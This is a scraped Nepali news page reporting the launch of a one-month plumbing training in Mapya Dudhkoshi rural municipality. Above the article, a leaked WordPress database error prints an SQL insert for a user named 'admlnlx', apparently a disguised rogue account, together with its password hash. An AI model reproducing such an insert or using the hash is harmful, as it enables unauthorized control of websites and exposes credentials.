WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BjmpynXc64N7XJ6/H0RbCbyAs.7krV.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-31 13:24:04', '', 'admlnlx', 'admlnlx')

माप्य दुधकोशी गाउँपालिकामा एक महिने प्लम्बिङ तालिम सुरु – Gaule Khabar

माप्य दुधकोशी गाउँपालिकामा एक महिने प्लम्बिङ तालिम सुरु

माप्य दुधकोशी गाउँपालिकामा एक महिने प्लम्बिङ तालिम सुरु

गाउँले न्यूज, २ असार, सोलुखुम्बु । माप्य दुधकोशी गाउँपालिकाको आर्थिक सहयोगमा काँकु समावेशी विकास समिति काठमाडौंले व्यवसायिक तथा सीप विकास तालिम केन्द्र इटहरीको प्राविधिक सहयोगमा १ महिने आधारभूत प्लम्बिङ तालिम सुरु गरेको छ ।

उत्घाटन समारोहालाई सम्बोधन गर्दै कार्यक्रमका प्रमुख अतिथी तथा माप्य दुधकोशी गाउँपालिका अध्यक्ष बुद्धि किरण राईले स्थानीय सरकारले युवा स्वरोजगार बढाउन यस्ता सीप मुलक तालिम सञ्चालन गरेको र नागरिकको पनि दायित्व रहेको बताए ।

काँकु समावेशी विकास समिति काठमाडौंका अध्यक्ष चन्द्र बहादुर राईको अध्यक्षतामा समपन्न कार्यक्रममा संस्थाका महासचिव तिलक राईले सञ्चालन गरेका थिए भने यस तालिमको प्रमुख उद्देश्य भनेको देशका बेरोजगार युवायुवतीहरुलाई सीपमूलक बनाएर आफ्नै देशमा आम्दानी गर्नको लागि वातावरण सिर्जना गर्नु रहेको महासचिव तिलक राईले बताए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका